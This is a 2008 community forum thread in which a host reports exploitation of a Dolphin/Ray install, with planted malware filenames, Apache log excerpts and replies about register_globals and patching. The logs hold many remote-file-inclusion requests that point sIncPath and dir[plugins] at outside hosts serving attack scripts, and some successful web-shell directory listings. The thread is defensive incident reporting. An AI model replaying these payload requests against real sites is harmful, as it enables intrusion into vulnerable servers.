Security issue!!!!!!

bambie posted 27th of October 2008 in Community Voice. 12 comments.
Your /ray directory is being heavily exploited. I've removed quite a few pieces of malware from this directory


[root@storm /home/******/public_html/ray/modules]# ll
-rw-r--r--   1  141323 Oct 24 10:33 bra.tar.gz
-rw-r--r--   1    5680 Oct 25 00:16 help.php
-rw-r--r--   1     621 Oct 21 04:36 ips.txt
-rw-------   1  148749 Oct 20 21:33 login.php
-rw-r--r--   1   8219 Oct 21 02:00 mm.php
-rw-r--r--   1      39 Oct 25 00:18 rm.txt
-rwxr-xr-x   1   40375 Oct 25 00:17 rxc.txt
-rw-------   1    5505 Oct 20 21:29 sun.php




211.214.161.239 /articles/entry/New-Games//?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
211.214.161.239 /articles/entry//?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
211.214.161.239 //?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
211.214.161.239 //?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
116.126.143.88 /deep//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
116.126.143.88 //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
116.126.143.88 //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
116.126.143.88 /deep//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ggdo.com/zboard/jem/id2.txt?? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
91.197.231.29 //?sIncPath=http://gosgo.com/bbs/idxx.txt?????? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
91.197.231.29 //?sIncPath=http://gosgo.com/bbs/idxx.txt?????? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
86.128.225.220 /member.php?action=show_login_form&relocate=http%3A%2F%2Fwww.profileconnexions.co.cc%2F 200
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 /contact.php//?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 /contact.php//?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
219.85.63.226 //?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? 503
219.85.63.226 /contact.php//?sIncPath=http://www.stormpages.com/arale/child/idfeelcomz.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 302
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 200
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 404
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 404
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idfeel.txt%0D? 302
140.130.101.5 //?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
140.130.101.5 /%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//?sIncPath=http://www.gosgo.com/bbs/idr.txt?? 503
202.142.223.158 //?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
202.142.223.158 /deep//?sIncPath=http://sayphoto.net/bbs/idd.txt? 503
203.146.15.54 /index.php?classifieds_mode=rand//plugins/safehtml/safehtml.php?dir[plugins]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? 503
203.146.15.54 //plugins/safehtml/safehtml.php?dir[plugins]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? 503
195.3.194.35 /about_us.php//?sIncPath=http://www.newminiclub.nl/copyright.txt?? 503

 
Comments
·Oldest
·Top
Please login to post a comment.
bambie
[root@storm /home/*******/www/ray/modules]# user=*******;awk '{print $1,$7,$9}' /usr/local/apache/domlogs/$user/*|grep -iE "http|ftp|union|select|concat"|grep 200|grep -v member
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a see more 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
[root@storm /home/*******/www/ray/modules]#



All successful hack attempts.
buckmcgoo
You always amaze me because you have spammed your hosting link all over expertzzz and here.. which I would guess is a reseller account. Then you post stuff like this to show everyone that you don't really know anything about hosting??
bambie
Please do not make statements with out knowing the facts.
buckmcgoo
I won't.. but the one above is correct.
sammie
well he sells hosting with register_globals On and cant read the minimum requirements or even protect his own site. make you wonder huh?
bambie
Out of all the scrips that run on my server none get hacked apart from Boonex scripts. We also host for OSDate and never in 5 years has a site on my server running OSDate been hacked.
buckmcgoo
Yeah but that is because your hosting has only been around 2 months.
bambie
Every think is fine on server end. I have had a security company investigate this and they say its an exploit in the script. My server is fully protected.

Also my site is hosted on a completely different server to my hosting.

And a member of staff has confirmed that the holes in the script are fixed.
deepesh
I am having problem in my site same security problem.. can you fix this...
This is what i got in my email..

We have suspended your account due to an emergency situation we had with the box, it triggered our firewall, and due to the malicious scripts your website was running, we had to immediately suspend it to avoid any further downtime for other customers on the box.

This is all we could gather of what was running, we couldn't find from where in your script it was running, just it was launching see more malicious code that is affecting the server.

meromate 30130 0.0 0.0 0 0 ? ZN 17:20 0:00 [sh]
meromate 30131 0.0 0.0 0 0 ? ZN 17:20 0:00 [sh]
meromate 30150 15.7 0.0 5656 3736 ? SN 17:20 3:20 html
meromate 30167 37.2 0.0 5648 3752 ? SN 17:20 7:54 html

5756 meromate 19 4 7404 5720 1428 S 0 0.1 0:00.23 perl
5758 meromate 21 4 7196 5488 1428 S 0 0.1 0:00.22 perl
5767 meromate 21 4 7156 5424 1476 S 0 0.1 0:00.24 perl
7204 meromate 21 4 8192 6500 1480 S 0 0.2 0:00.13 perl
7206 meromate 21 4 7568 5816 1428 S 0 0.1 0:00.23 perl

can you fix this.. please write me
praveenkv1988
You should turn register globals off. This was already discussed. Also the dolphin 6.1.3 patch fixed some of these type of attacks.
starrfire
Being new here I'm not privy to the members but the exploits shown in the 3 posts appear legit. Although, I have my register globals set to off. Some hosting companies such as hostgator (which is the #1 featured hosting company shown on this site) has register globals on but it can be changed in the cpanel via the Software/Services area > php.ini Quick Config.

If the globals are set to off and this is still taking place then there likely is a vulnerability somewhere in the script, although see more I'm not sure which version you're using. I'm testing the 6.1.5 and it seems stable but I've just started on it, so far, so good :-)
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.14157295227051